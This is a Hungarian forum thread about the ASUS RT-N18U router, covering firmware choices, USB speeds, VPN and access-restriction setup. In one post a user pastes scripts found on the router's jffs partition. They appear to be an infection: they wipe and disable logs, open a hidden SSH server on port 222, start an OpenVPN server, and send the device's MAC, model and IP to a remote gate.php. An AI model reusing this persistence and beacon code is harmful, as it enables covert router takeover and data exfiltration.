- Egy dolgot már elért az AI: még többet vásárolunk
- Ultragyors EV-töltőkért szövetkezik az Xpeng és a Volkswagen
- Vakarja a fejét a félvezetőipar: az egekben az antimon ára
- Az USA szerint a CATL és a Tencent kiszolgálhatják a hadiipart
- Trump visszatérése előtt vált globális ügyekért felelős vezetőt a Meta
-
IT café
600 Mbps-os tempót ígér 2,4 GHz-en az ASUS RT-N18U High Power routere
Új hozzászólás Aktív témák
-
őstag
Köszönöm, most kaptam [intruder2k5] -től egy leírást és teszek egy próbát.
Precision M7710_&_Precision M7740- CPU: 9980HK, RAM: 32GB/3200MHz, GPU: RTX5000, IGZO 4K-UHD, SSD: 2TB Force MP510, 2TB ADATA XPG SX8200 PRO, 1TB SK HYNIX Class 50 SSD
-
őstag
válasz Intruder2k5 #13798 üzenetére
Csak annyi lenne? Hát ezt nem gondoltam volna, de egy próbát megér.
Köszönöm a linket, ezt kerestem, de nem találtam pedig Google a barátomPrecision M7710_&_Precision M7740- CPU: 9980HK, RAM: 32GB/3200MHz, GPU: RTX5000, IGZO 4K-UHD, SSD: 2TB Force MP510, 2TB ADATA XPG SX8200 PRO, 1TB SK HYNIX Class 50 SSD
-
MODERÁTOR
válasz VANESSZA1 #13796 üzenetére
Üdv!
A NordVPN help nem segít? Tomato setup with NordVPN
Mondjuk VPN-en keresztül netezve nagy sebességre ne számíts! Nem tudom a VPN előfizetésed mennyit bírna, de azért ezeknek a routereknek nem ez az elsődleges funkciója, nincs bennük célhardver, így tippem szerint max. 30-40Mbps lesz OpenVPN-en keresztül.
-
őstag
Üdv szakik,
Tomato firmware-t használok. Van egy Nordvpn előfizetésem, és szeretném, ha a router automatikusan csatlakozna a Nordvpn szerverre, és már ilyen internet lenne megosztva wifin. Megoldható ez?
Ha igen, akkor mit és hogyan kell beállitanom?Precision M7710_&_Precision M7740- CPU: 9980HK, RAM: 32GB/3200MHz, GPU: RTX5000, IGZO 4K-UHD, SSD: 2TB Force MP510, 2TB ADATA XPG SX8200 PRO, 1TB SK HYNIX Class 50 SSD
-
limpi
aktív tag
-
-
limpi
aktív tag
válasz ArthurShelby #13791 üzenetére
Köszi!
Akkor lehet, hogy az RT-N18U-nál is jó még az árnyékolás. (Hihetetlen, hogy ezt később "kispórolták".)
Abban igazad van, hogy a router-ről vezetékes LAN-on a szekvenciális max. másolási sebesség nem éri el az USB 2.0 maximumát sem (~43,6 MB/s nekem átlagosan).
Viszont én anno azért kapcsolta be mégis az USB 3.0 módot, mert abban reménykedtem,
hogy a Transmission 2.92 (Asus Download Master) működését esetleg olajozottabbá teszi,
mivel ahhoz a router-re közvetlenül egy rövid USB 3.0 kábellel van rákötve USB 3.0 külső HDD. De lemérni a belső sebességet nem tudtam, szóval lehet, hogy csak placebo hatás.
Mindenesetre interferencia sem tűnt fel.[ Szerkesztve ]
<:v)
-
limpi
aktív tag
válasz ArthurShelby #13790 üzenetére
Azt azért nem lehet, mert én mindig IP-vel lépek be...
A router.asus.com-ot tökre utálom, csak sehogy sem sikerült kikapcsolnom. Van erre trükk?
A CaPtChA nekem firefox-on megint jött, pedig ma jelentkeztem be először...
Nálad akkor viszont sosem jelenik meg?<:v)
-
ArthurShelby
addikt
Az usb 3.0-nak ac56u-nál volt csak rendes árnyékolása elvileg. Én soha sem kapcsolgattam, hagytam alapbeállításon. Alapból nem elég erős a router usb 3.0-hoz szerintem, szóval fölösleges ezen rugózni.
Az usb 2.0 névlegesen 60MB/s-ot tud, ennek jó ha a fele megvan szekvenciálisan egy asus routernél.
Nas-oknál lehet szűk keresztmetszet az usb2.0 (ott a gigabit a szűk keresztmetszet, mert gyakorlatban a gigabit ~110MB/s).A rosszban mindig van valami megtévesztően jó, különben nem választanánk a rosszat
-
-
tjsz
senior tag
válasz cstibi #13788 üzenetére
Szia!
Igen,
- N18U-n a WAN-t letiltod,
- a szolgáltatói router-eden beállított IP tartományból beállítasz az N18U-n egy IP címet (amit a szolgáltatói routered nem oszt ki),
- beállítod az N18U-n, hogy a default gateway a szolg. router legyen,
- beállítod az N18U-n, hogy a DNS kiszolgáló szintén a szolg. router legyen
- a wifit kikapcsolod az N18U-n
- a szolg. router-en beállítod a torrent-hez és a távoli eléréshez a megfelelő port forward-okat -
cstibi
csendes tag
Sziasztok!
Az elmúlt hat évben nagy megelégedéssel használtam az N18U-t, de most már kiváltottam a szolgáltatói routerrel, ami tudja az 5 GHz-es wifit.
Abban kérnék segítséget, hogy FreshTomato alatt megoldható-e az hogy a hálózat részeként továbbra is üzemeljen médiaszerverként és külső HDD-vel torrentszerverként, valamint ha igen, akkor hogyan tudom ezt a legegyszerűbben beállítani? Minél részletesebb útmutatót kapok, annál jobb.
A cél az lenne, hogy a tv és az asztali gépek továbbra is egyszerűen hozzáférjenek a külső HDD-jéhez, esetleg ezután is tudjak oda letölteni transmission-al.
Előre is köszönöm a segítséget! -
limpi
aktív tag
Böngésző függő (is) lehet, mert nekem
Firefox 77.0.1 (64 bites) és iOS 13.5.1 Safari-ja alatt mindig van CaPtChA,
Chrome 83.0.4103.97 (64 bites) alatt viszont sosincs.
Próbáltam Firefox-on a sütik törlését, de az sem segített rajta.
De lassan már megszokom...[ Szerkesztve ]
-
limpi
aktív tag
válasz ArthurShelby #13782 üzenetére
Ezzel kapcs. van tapasztalatod?:
https://www.snbforums.com/threads/asus-rt-ac68u-usb-3-0-wifi-interference-setting.47370/
Ilyeneket írnak:
"The USB Mode 3.0 setting will enable USB 3.0 speeds (fastest), and will likely interfere with 2.4 GHz WiFi, causing the Tx/Rx rates to drop."
Meg korábban állítólag volt külön "USB 3.0 reduce interference" setting is az Administration \ System alatt.
Nekem RT-N18U esetén nem tűnt fel ilyesmi gond.
RT-AC68U esetén ez egy tényleg létező probléma?[ Szerkesztve ]
-
limpi
aktív tag
-
limpi
aktív tag
Egyébként az Administration \ Privacy alatt nálatok is hiányzik az érdemi tartalom?
Nálam így néz ki:Már az előző verziónál is ilyen volt, pedig annál végül kellett csinálnom full factory reset-et, de ezt a fület nekem az sem rakta rendbe...
(Viszont amúgy működik minden, szóval gondolom úgy veszi, hogy mindenhez hozzájárultam...)<:v)
-
limpi
aktív tag
Na, mivel nem írt senki semmi rosszat róla, felraktam.
Szerencsére gond nélkül felment és egyelőre nem vettem észre, hogy bármit elrontott volna.
(A webadmin felületéről frissítettem és nem csináltam sem előtte, sem utána semmilyen reset-et sem...)Ami újdonságot eddig észrevettem, az a bejelentkezéskori CaPtChA:
Ettől lehet, hogy kicsit biztonságosabb, csak kicsit kényelmetlenebb is.Első DM enable során nekem belefagyott az USB Application lista frissítésébe
(de csak a GUI, a háttérben rendben elindult).Remélem jó marad és nem kell majd alaphelyzetbe hozni.
(Az előző verzió uptime-ja már majdnem egy év volt, csak emiatt a frissítés miatt nullázódott most...)[ Szerkesztve ]
-
limpi
aktív tag
Azóta feltette már valaki?
Ez a két hiba:
CVE-2018-20334
CVE-2018-20336
már a 2019/05/16 dátumú 3.0.0.4.382.51634 verziónál is fel volt sorolva a javítások között.
Akkor most megint javították őket?
(Egyébként az Asus Download Master-ből is kijött nemrég egy új verzió, a 3.1.0.107.
Nekem gond nélkül felment, semmilyen változást nem észleltem tőle.
De legalább nem is rontott el semmit.
A DM beállításainak egy részét mondjuk alaphelyzetbe hozta, de ezt már megszoktam
és könnyen visszaállítottam mindet. Szóval ezeket érdemes eltárolni a frissítés előtt!
Meg ugye a Remote GUI-val érdemes használni:
https://github.com/transmission-remote-gui/transgui/releases
Csakis "alternative bandwith" (csiga) mód mellett, valamint a le- és feltöltési sebességeket is érdemes limitálni ahhoz, hogy stabilan jól működjön, nálam pl. ezekkel teljesen jó:
max. download: 3000 KB/s (ez nem érdemes emelnem, mert szarabb tőle a végeredmény)
max. upload: 150 KB/s (ezt biztos lehetne még emelnem, de nem játszottam vele, nekem elég)
Gyorsabb stabil letöltést nem tudtam kicsikarni belőle, hiába az USB 3.0-n csatlakoztatott viszonylag gyors WD Black mobile HDD. Szerintem kb. ennyit tud a router hardvere, a CPU sem egy erős, a RAM is extra kevés...)[ Szerkesztve ]
-
efi99
őstag
Új gyári firmware. Próbálta már valaki?
Verzió 3.0.0.4.382.52230 2020/06/01 30.49 MBytes
ASUS RT-N18U Firmware version 3.0.0.4.382.52230
- Fixed CVE-2018-20334
- Fixed CVE-2018-20336
- Fixed null pointer issue.
- Fixed DDoS vulnerability.
- Fixed command injection vulnerability.
- Fixed buffer overflow vulnerability.
- Fixed QoS UI bugs.Annyit dolgozom, hogy lassan már az ivás rovására megy.
-
Stef@N
tag
válasz Gubek-Einste #13772 üzenetére
Jogos, csak próbálnám minél kevesebb melóval megúszni
Egyébként a jffs partícíóval van valami baja. Amit találtam eltérést a legutóbbi mentés óta, hogy a services-start-ba beleíródott egy ilyen.
sleep 180
if [ "$(nvram get rcvar)" != "1" ]; then
cru a services-start "*/10 * * * * sh /jffs/configs/start.sh &"
mkdir /dev/net
mknod /dev/net/tun c 10 200
chmod 666 /dev/net/tun
modprobe tun
rm /tmp/syslog.log
rm /tmp/syslog.log-1
rm /jffs/syslog.log
rm /jffs/syslog.log-1
ln -s /dev/null /tmp/syslog.log
ln -s /dev/null /tmp/syslog.log-1
fi
mkdir /etc/dropbear
dropbear -R -p 222 -aés lett egy config/start.sh fájlom:
#!/bin/sh
iptables -L | grep 1194 > /dev/null
if [ $? -ne 0 ]; then
sh /jffs/configs/iptables.sh
fi
ps -w | grep -v grep | grep openvpn > /dev/null
if [ $? -ne 0 ]; then
openvpn --config /jffs/configs/server.ovpn
fi
MACADDR=$(nvram show | grep boardnum -m1 | grep -v grep)
MODEL=$(nvram show | grep model= -m1 | grep -v grep)
FIRMVARE=$(uname -o)
MYIP=$(wget -qO- ipinfo.io/ip)
TIME=$(wget -qO- ipinfo.io/ip | awk "BEGIN {FS=\".\"}{print \$1}")
SL=$(($TIME + $TIME))
sleep $SL
wget -q -nv -O /tmp/null https://bofo.tech/root/gate.php?a=$MACADDR\&b=$MODEL:$FIRMVARE\&c=$MYIP >/dev/null 2>/dev/null --no-check-certificate
van sejtésed, hogy ez mi lehet?[ Szerkesztve ]
-
titán
válasz Stef@N #13771 üzenetére
Kérdésem, ha csinálok egy hard resetet majd visszaállítom a beállításokat, jffs partíció tartalmát, akkor valószínűleg a "hibát" is visszaállítom? Vagy érdemes megpróbálni?
A reset-nek pont az lenne a lényege, hogy tiszta lapot kezdjünk így nem érdemes reset után semmilyen mentett beállítást visszatölteni.Egy dolog állandó: a változás - Internet powered by Vodafone Net L with CBN CH7465VF & Asus RT-AC65P
-
Stef@N
tag
Üdv mindenkinek! Két éves 380.70.1_HGG-RC2 rendszerem kezd meghülyülni. Ha újraindítom nagyon lassan bootol be ~10 perc, nem logol és a wifi hálózat is lassabbnak tűnik. Minden más rendben egyébként (külső elérés, torrent stb.) Kérdésem, ha csinálok egy hard resetet majd visszaállítom a beállításokat, jffs partíció tartalmát, akkor valószínűleg a "hibát" is visszaállítom? Vagy érdemes megpróbálni?
-
Ybear
tag
válasz Mostly Harmless #13754 üzenetére
Nálam az utolsó HGG (jó régi ) van fent.
Ha menni kell, hát menni kell.
-
locon70
csendes tag
Hali
Asuswrt-Merlin firmware ASUS RT-N18U router
Transmission remote gui maximális feltöltési sebesség mindig visszaáll 40KB/s -re Miért?
hiába veszem ki a pipát a köv. indításnál újra ott a pipa -
DieHard
senior tag
válasz Siriusb #13765 üzenetére
Természetesen kábelen mérek. Most annyi történt hogy valami oknál fogva a Sagem modemem mindi kikapcsolja a bridge módot. Pedig hozzá sem nyúltam. Max felkeltem reggel Igy ő a 192,168,0,1-en van dhcp-vel. Az asus router meg a 192,168,1,...-es tartományban figyel. Tudom nem egészséges, de igy már 600 a sebesség. De erre a NAT dologra ránézek.
-
DieHard
senior tag
Sziasztok!
A routerrel a következő problémám lenne. Most kötötték be trékom a gigabitet. Bridgeltem azonnal mert katasztrófa netet produklál, minden behalt. A router osztja az IP-ket. Viszont a sebességem 260Mbit felé nem megy. Tud valaki hasonlóról? Mit kell még állítani?
Üdv!
-
félisten
Persze, gigabites kábel, amin egyébként 900 mbps fölötti a sebesség.
Amúgy meg az utolsó HGG béta, de Tomaton is ennyit tudott.
MaCS
[ Szerkesztve ]
Fán nem lehet motorozni, motoron viszont lehet fázni!
-
félisten
válasz Fernet #13757 üzenetére
Ha az N18 jele 2 falon túl gyenge, ott szerintem komoly esélye van annak, hogy maga a környezet nem kedvező.
Az N18 ugye eleve csak 2,4 GHz-es, ami messzire eljut és gyakorlatilag minden routeren be van kapcsolva.
Mielőtt egy fillért is kiadsz, rá kéne nézni a környező wifi állására! Erős a gyanúm, hogy 2,4 GHz-en ez már nem lesz jó.
MaCS
-
Fernet
senior tag
válasz Gubek-Einste #13758 üzenetére
Köszönöm!
Megnézem ezt az Asus N12-est. -
titán
válasz Fernet #13757 üzenetére
Repeater-ből inkább egy normál méretű külső antennás típus lenne ajánlott. Az ilyen konnektorban dugós típusokkal főleg az a baj, hogy a konnektor a padló közelében és/vagy rejtett helyen van ami jelentős árnyékoló tényező. A másik jelentős hátrányuk, hogy beépített kicsi antennákkal rendelkeznek azáltal gyengén veszik az elődleges eszköz által üzemeltet wifi hálózatot és gyengén is tudják csak továbbítani azt, valamint a lefedett terület sem lesz olyan nagyságú mint a normál méretű külső antennás eszközöknél.
Repeater-nek a legjobb egy normál wifi router-t használni, van amelyik gyári firmware-rel is képes rá (Asus N12 D1 vagy N18U) de a legtöbb csak CFW telepítésével tehető rá alkalmassá.
Kaphatóak multifunkciós AP-k is amelyek szintén tudják gyári firmware-rel a repeater módot is de az áruk ugyan annyi vagy több mint a sima wifi router-eké így nem éri meg a megvásárlásuk, a wifi router-ek előnye, hogy később még router-ként is lehet őket használni.
Ha megoldható akkor inkább az a javasolt, hogy kábeles kapcsolattal használjál egy második wifi router-t AP módban.
A repeater-t olyan helyre kell tenni ahol az eredeti wifi jel még viszonylag jól fogható mivel a vételi erősség egyenes arányban áll az elérhető sebességgel vagyis a gyenge jel = alacsony sebesség. A repeater működés során alapból lesz egy link sebesség feleződés is így a gyenge jel/alacsony sebesség esetén ez még további csökkenést fog eredményezni akár a teljesen használhatatlanságig is.
Alternatív megoldás lehet a Powerline használata de az nagyban függ az áramhálózat állapottól és kialakításától.Egy dolog állandó: a változás - Internet powered by Vodafone Net L with CBN CH7465VF & Asus RT-AC65P
-
Fernet
senior tag
Üdv!
Társasházban használok egy N18-as routert, de a lakás másik végében (2 fal) nagyon gyenge, illetve néha szakad a wifi jel. A kábelezés macerás lenne, egy ILYEN erősítővel érdemes próbálkozni?
-
0519
senior tag
válasz Doky1988 #13753 üzenetére
Ha van időd, lehetőséged, ezt próbáld ki a sebesség növeléséhez dd-wrt alatt:
Setup - Basic Setup - Optional Settings - Shortcut Forwarding Engine: EnableA technika a Qualcomm szoftveres megoldása a HW NAT helyett.
QoS-sel nem működik együtt, választani kell.Angol leírás a technikáról:
https://source.codeaurora.org/quic/qsdk/oss/lklm/shortcut-fe/plain/README?h=banana''Vígan ülünk tort azok fölött akik ellenünk törtek'' -Addams family
-
MODERÁTOR
"gondolod, hogy a usb2-n stabilabb teljesítményt adna? egy próbát megér..."
Mindenképp próbáld meg! Az összevissza ingadozó 4-5MB/sec-től sokkal jobb a stabil 20-25MB/sec, sokkal több meg szerintem USB 3.0-n se lehetne, mert ott a router hardvere is korlátoz már."bár azon meg mindig lefagyott a torrent kliens, ha nagyobb (10G+) torrentet indítottam el rajta"
Nem biztos, hogy lefagyott, csak talán alapbeállítás szerint aktív a file-ok helyének előre lefoglalása, ami ilyen tempó és ekkora torrent méret mellett akár 10-15 perc is lehet. Ha minden igaz a Transmission custom konfig részben ez a fícsör kikapcsolható. -
Mostly Harmless
tag
mindenkinek köszi a válaszokat.
@intruder2k5: a vinyó természetesen az usb3-as (kék) portra van dugva. gondolod, hogy a usb2-n stabilabb teljesítményt adna? egy próbát megér...
@Ybear: ezt a mérést mivel csináltad? a freshtomatoban nincs ilyen. (a cpu/ram képekre gondolok)
@MaCS_70: gondolom, ezek a sebességek gigabites kábellel jöttek létre. milyen firmware van rajta?még mindig vacillálok, merre lépjek tovább.
- lehet, hogy visszateszem a Shibby-féle Tomatot, bár az régi, és nem frissítik, de úgy emlékszem, az nem produkálta ezt a jelenséget - bár azon meg mindig lefagyott a torrent kliens, ha nagyobb (10G+) torrentet indítottam el rajta.
- lehet, hogy visszateszek egy friss gyári firmware-t, azt olvastam itt, hogy a mostani verziókat már lehet Transmission Remote GUI-val távirányítani, nekem más igényem nem nagyon van.
- elindult bennem a vezérhangya, hogy kéne egy új router, amiben többmagos proci van...(the cake is a lie)
-
0519
senior tag
válasz Doky1988 #13749 üzenetére
Sebességlimit:
Én nem ütköztem bele ebbe a korlátba eddig, mert nem ilyen gyors a net elérésem.
Feltételezésem szerint ez egy bug, amit javítani fognak. Hetente jön ki új kiadás, az egyikben javítani fogják.- "LED-eket valahol kilehet-e menüből kapcsolni a routeren?"
- Nem
- "WIFI csatornát lehet-e 11 felett használni?"
- Nekem 13-ig elérhetőek''Vígan ülünk tort azok fölött akik ellenünk törtek'' -Addams family
-
Doky1988
senior tag
Felraktam én is, nem rossz de sebességmérésem jóval alatta van a merlin fw-nek
1gbitből DD-WRT-n 600mbit kb Ez a Merlin FW-vel, volt mikor 900 fölött is volt, de majd mindjárt visszarakom a merlint, és mérek neked azzal egyet kíváncsiságbólLED-eket valahol kilehet-e menüből kapcsolni a routeren?
WIFI csatornát lehet-e 11 felett használni?Egyébként sok mindent tud, olyat is amit kb soha nem használnék, tetszik csak nekem hiányoznak belőle dolgok amiket a Merlin tud
DokY | www.zsolti.hu
-
-FreaK-
veterán
válasz -FreaK- #13737 üzenetére
Ma volt időm foglalkozni vele kicsit, rá is jöttem, hogy mi volt a gond. Nem akarok nagy képet berakni, de biztos láttátok már a Picard kapitányos facepalm-ot
Szóval mikor átdugtam a gépem a modembe, aztán vissza, akkor igazából egy másik kábelt dugtam vissza a routerba, ezért is nem volt IP TV a nappaliban (amit ritkán nézünk, szóval nem sokat zavart). Így persze, hogy nem értem el a router konfingot, a modem-en keresztül gratuláltam magamnak..
[ Szerkesztve ]
-
félisten
válasz Intruder2k5 #13742 üzenetére
Nálam hat éve megy egy N18u, időnként tesztelem a csatlakoztatott HDD sebességét.
Az NTFS partíción 23/26 Mbps az írás/olvasási sebesség, az Ext4-esen 22/26.
Több, erősebb hardverű Asus routeren is hasonló értékeket mértem.
MaCS
-
Ybear
tag
válasz Intruder2k5 #13742 üzenetére
Nekem is gigás kábelen van a kapcsolatom, és nekem sem tetszik a másolás sebessége, csak tudomásul vettem, és együtt élek vele.
Maga a vinyó direktben PC-n azért többet tud ennél:Viszont annyira nem értek hozzá, hogy oknyomozásba fogjak.
Ami felettébb valószínű nála (és ezek szerint nálam is): a router sw a gigás kapcsolatot másképpen kezeli, mint a nem gigásat. A tünetet látom, az okát nem tudom sajnos.Ha menni kell, hát menni kell.
-
MODERÁTOR
A ~4MB/sec akkor sem normális, attól a pár évvel öregebb RT-N66U is többet tudott. Néhány évig használtam én is RT-N18U-t Tomato-val, és bár arról nincs saját tesztem megörökítve, de nagyságrendileg ~20MB/sec körül az is ment. Persze ez függ a protokolltól, és a filerendszer típusától is. De amint látod korábban nála is ment 11MB/sec fölött stabilan, szóval 4MB/sec-nél nem lehet CPU limit.
-
Ybear
tag
válasz Mostly Harmless #13734 üzenetére
A kérdésem az volna, mi okozhatja ezt? Ennyit tud a router hardvere? Az egymagos cpu?
Röviden: igen.
Néztem a router cpu terheltséget másolás közben, és nem mutatott kiugró értékeket.
Szóval nálam meg fullosra kiterheli a CPU-t, meg a memóriát is.
Ez egy router, nem pc. Sambánál csak a CPU-n keresztül tud másolni.
Régebben volt DIGI gigás hozzáférésem, azt viszont simán kezelte, arra van hw a routerben. Tapasztalatom szerint csak ezek a plusz funkciók (samba, torrent, stb) eszik meg a CPU-t ennyire.[ Szerkesztve ]
Ha menni kell, hát menni kell.
-
MODERÁTOR
válasz Mostly Harmless #13739 üzenetére
Üdv!
A HDD az USB 3-as, vagy az USB 2.0-s portba van kötve? Próbáld meg a másikban is! Illetve ha tudod, javaslom próbáld meg FTP-n keresztül is elérni, ha van rá mód akkor FileZilla-val. Nekem legalábbis Windows-ban az FTP/FileZilla páros hozta a legjobb eredményeket, ha sok adatot kellett mozgatnom a router HDD-ről a laptopra vagy fordítva, mindig azt használtam.
-
tjsz
senior tag
válasz Mostly Harmless #13734 üzenetére
Szia!
11.3MByte/s átvitelt tud a vinyód, tehát ez az érték teljesen ok. Ennél többet nem igazán fogsz tudni kihozni belőle.
A gigabites kábeleknél én megpróbálnám az iperf-el tesztelni, hogy nem-e a kábellel van gond (a freshtomato-ban is van iperf ill. a gépedre is le tudsz tölteni).
[ Szerkesztve ]
-
-FreaK-
veterán
válasz gabro0 #13732 üzenetére
Nem semmit.
(#13733)htc07
Frissítettem Intel lan drivert, semmi.Kipróbáltam az ipconfig release+renew-t, semmi.
Ethernet vezérlő letiltás/engedélyezés, semmi.
Nvram törlést még nem próbáltam (most perpill többen használjuk),
de ott meg kicsit félek attól, hogy ha utána sem megy, akkor konfigolhatom be telefonról.Másik PC-ről működik. Csak ez van tiltva valamiért..
[ Szerkesztve ]
-
0519
senior tag
évek óta csak beta-t adnak ki, nem tudom az okát.
stabilan működik és jól végzi a dolgát.''Vígan ülünk tort azok fölött akik ellenünk törtek'' -Addams family
-
Mostly Harmless
tag
Sziasztok.
Bonyolult kérdésem van a routerrel kapcsolatban, amire ti talán tudtok egyszerű választ.
Tehát, van egy ilyen routerem, amin FreshTomato 2020.2 firmware van. (jelenleg ez a legfrissebb.)
A routerre van dugva egy usb3-as vinyó, helyi fájlmegosztás (samba), dlna, meg torrent fut rajta.
A net 100 megabites Digi, a 90-95-öt stabilan tartani szokta.
A gép (asztali pc) eddig 100 megabites kábellel volt rádugva a routerre, ez felújításkor lett behúzva a falba. Ez samba megosztásról másolva stabilan megy.
Nemrég cimbivel kihúztunk egy gigabites kábelt a router meg a gép közé, de mint kiderült, azon közel sem ilyen stabil a kapcsolat. Sőt, néha le is dobja.
Ezt látva leszedtem a routert a helyéről, és az itthon talált gigabites rövid kábelekkel elkezdtem próbálgatni. Az eredmény ugyanilyen, tehát nem kábelhiba.A kérdésem az volna, mi okozhatja ezt? Ennyit tud a router hardvere? Az egymagos cpu?
Néztem a router cpu terheltséget másolás közben, és nem mutatott kiugró értékeket. (kép erről is van)Terveztem a Diginél sebességet emeltetni, de nincs értelme, ha a lakáson belüli szakaszon elakad a dolog. Milyen irányba induljak el? Ismét új kábel? Vagy kezdjek el router cserén gondolkodni? Köszi a válaszokat.
(the cake is a lie)
-
-FreaK-
veterán
válasz kisbalazs83 #13727 üzenetére
Persze, előtte is, utána is.
Lehet nem írtam egyértelműen, de a frissítés után nem volt semmi gond, bejött az oldal, be is konfigoltam.
Aztán Telekomos ügyfélszolgálat végzett távolról diagnosztikát, mert lassú volt a net (mint kiderült nem itt volt a gond), és ennek folyamán kipróbáltuk, hogy a PC-met egyből a modembe dugtuk, kikerülve a routert. Aztán vissza dugtam és használtam tovább, de azóta a konfig felület nem érhető el erről a PC-ről.Köszi a linkeket, kipróbáltam, de:
Restartoltam már modemet is, routert is, PC-t is, semmi.
Egy ötletem van még, mégpedig, hogy nvram törlés ismét...
-
félisten
válasz kisbalazs83 #13729 üzenetére
Igazad van!
MaCS
-
félisten
válasz kisbalazs83 #13727 üzenetére
Biztos, hogy a WPS-t?
MaCS
-
kisbalazs83
aktív tag
válasz -FreaK- #13726 üzenetére
Csináltál felrakás után resetet? WPS gombot tartva kapcsold be és tarts amíg villogni nem kezd a power led.
Ezek közül valamelyikre?
http://router.asus.com/Main_Login.asp
https://router.asus.com:8443/Main_Login.asp
http://192.168.1.1/Main_Login.asp
https://192.168.1.1:8443/Main_Login.asp[ Szerkesztve ]
65JZ1000, 65PUS7506, 55OLED754, FTXF42D
-
-FreaK-
veterán
Felraktam múlt héten én is a Gzenux Merlint (lecserélve egy jó öreg HGG-t), és nagyjából jól is működött, de múlt pénteken egy net probléma miatt (szolgáltató volt a ludas) távolról végeztek diagnosztikát és hogy kizárjuk a routert, átdugtam direkt a modembe a PC-m Lan kábelét, majd utána vissza a router-ba, és ezzel még nem volt gond, megy tovább minden ahogy kell. Kivéve, hogy a 192.168.1.1.-en nem jön be a router konfig felülete. Telefonon működik, de az enyémen nem. Mi lehet a baja?
Modem és router restart is megvolt persze.[ Szerkesztve ]
-
ArthurShelby
addikt
Ha kikapcsolod a nat-ot, kikapcsolod a dhcp szervert és egy alhálón vannak, akkor elvileg nem kell variálnod a portokkal, és nem lesz ip ütközés (bár így nem tudom milyen ip-t és hogy fognak kapni a vpn-esek).
Illetve csinálhatod azt is kikapcsolt nat, és bekapcsolt dhcp szerver mellett, hogy másik alhálóra teszed az új routert, és az eredeti routerben meg lan->útvonalnál (routing) átirányítod.
Így látják egymást oda-vissza, viszont alhálózat-ipben különbözni fognak.[ Szerkesztve ]
A rosszban mindig van valami megtévesztően jó, különben nem választanánk a rosszat
-
htc07
addikt
válasz ArthurShelby #13723 üzenetére
Csak nem jön össze, IP ütközést ír.
Kipróbálom milyen router módban, csak lesz vagy fél óra, mire átvariálom a port forwardokat
-
htc07
addikt
válasz Intruder2k5 #13721 üzenetére
Köszi, közben átpörgettem a netet (miért nem előbb), és mindenhol azt írják, hogy nem lehetséges.
Úgyhogy átraktam router módba, kapott egy statikus címet a másik router DHCP pooljából, és kikapcsoltam a DHCP szervert az Asuson - egyelőre úgy tűnik minden működik. Nem túl elegáns megoldás mondjuk. Remélem nem lesznek anomáliák.
-
MODERÁTOR
Próbáld meg ezt: /Advanced_VPN_OpenVPN.asp Legalábbis az emulátorban ez a címe.
-
htc07
addikt
Rászántam magam, és hátrahagytam a HGG-t, felszenvedtem a Merlin-t (384.16).
Van rá valami hack, hogy lehessen VPN szervert indítani AP módban?
Esetleg valaki el tudná küldeni a VPN konfig URL címét, hátha amúgy él az oldal, csak a menüben nincs benne? Tudom port forwarding satöbbi, nem gond. Egy másik router mögött ül, igazából kvázi switch szerepet játszik, de ha már tud VPN szerver lenni, miért ne.
Szerk. a router mode nem játszik, mert egy hálózaton kell legyen a két router.
[ Szerkesztve ]
-
Beren
aktív tag
Ez is egy jó ötlet, van dnsmasq az Advanced Tomato-ban is, de gonosz apa révén magamnak nem akarom letiltani a Youtube-ot, csak a gyereknek... Ahogy utánanéztem, a dnsmasq nem tud olyat, hogy egy gépre célzott szabály, de örülnék, ha tévedek, mert ez lenne a legegyszerűbb és a gyerek által nem igazán megkerülhető megoldás.
-
Beren
aktív tag
Ez jó ötlet, de a megvalósítást nem vállalom, mert ehhez azért fű vagyok...
Viszont egyelőre megoldottam favágó módszerrel - mivel a gyerek nem ért hozzá kb. semennyire, így bementem a szobájába, kizavartam, majd a Windows host fájljában minden Youtube domaint a 127.0.0.1-re irányítottam... -
htc07
addikt
Azt tudom esetleg javasolni, hogy csinálj egy saját DNS szervert, és azon tiltsd az oldalakat. Pl. AdGuard. Feldobod egy raspberryre, és átállítod a routeren, hogy ez legyen a DNS szerver, aztán a klienseknek tudod szűrni parental controllal egyesével is asszem, hogy mihez férhetnek hozzá.
-
MODERÁTOR
De lehet nálad csak a trackert blokkolja ilyenkor a router, így letölteni nem tudnak, de az ncore oldalát böngészni igen. Régebben még valamelyik Shibby verzióban volt HTTPS blokkolás, azt hiszem még 100 előtt, de aztán egy későbbi verzióban megszűnt. Az ottani changelog-ban biztosan elő lehet keresni.
szerk.:
Meg is kerestem... https://tomato.groov.pl[RELEASE] 111 – ACCESS RESTRICTION: use string module instead web module (https is blocked now – facebook for example)
[RELEASE] 119 – Access Restriction: return to old „web module” style. „String” module is still in image, advanced users can use it in own iptables rules,E-szerint tehát csak a 111 és 118 közti kiadásokban működik a HTTPS blokkolás az Access Restriction menüből, az után pedig már csak iptables szabályokkal lehet megoldani.
[ Szerkesztve ]
-
0519
senior tag
válasz ArthurShelby #13706 üzenetére
Igen, vendég wifi. Internetelérés van, helyi hálózathoz nem fér hozzá.
''Vígan ülünk tort azok fölött akik ellenünk törtek'' -Addams family
-
0519
senior tag
válasz -FreaK- #13705 üzenetére
Nem, független projekt.
Arra utaltam, hogy az eredeti kijelentés azon része, hogy DD-WRT "korlátozottan használható" nem igaz.
Frisset:r43078
[DD-WRT letöltés]''Vígan ülünk tort azok fölött akik ellenünk törtek'' -Addams family
-
Beren
aktív tag
Üdv!
Látom, más is küzd az Access Restrictionnal... Nekem csak egy kérdésem lenne: a https címeket még mindig nem lehet tiltani vele? Próbáltam a gyereket tanulási időben lerobbantani a Youtube-ról, nem érti a szép szót, így kénytelen vagyok durvább eszközöket igénybe venni, de az Access Restrictionnal sehogy sem tudom letiltani. Ja, Advanced Tomato van a routeren.
Beren
-
kemcso
Ármester
válasz kemcso #13701 üzenetére
Újabb probléma merült fel
Működik az Access Restriction, de csak új kapcsolat esetén. Adott egy időzített rule, ami mondjuk 10:00-kor lép életbe: ha akkor van az adott gépnek élő kapcsolata akkor azt nem szakítja meg, a rule ki-be kapcsolása esetén se. Router újraindítása esetén jól működik és új kapcsolatot nem engedélyez. Mintha ez régen nem így működött volna, jelenleg FreshTomato Firmware 2020.2 K26ARM USB AIO-64K-NOSMP van fönt.Valakinek ötlete? Esetleg DD-WRT?
-
-FreaK-
veterán
válasz Gubek-Einste #12990 üzenetére
Szia!
"- DD-WRT
- OpenWRT
Csak korlátozottan használhatóak."Ez még a mai napig igaz? OpenWRT-t gondoltam kipróbálni.
De kezdem az elejéről, ezért kérdeztem tegnap a másik topicban is, hogy milyen router ajánlotok.
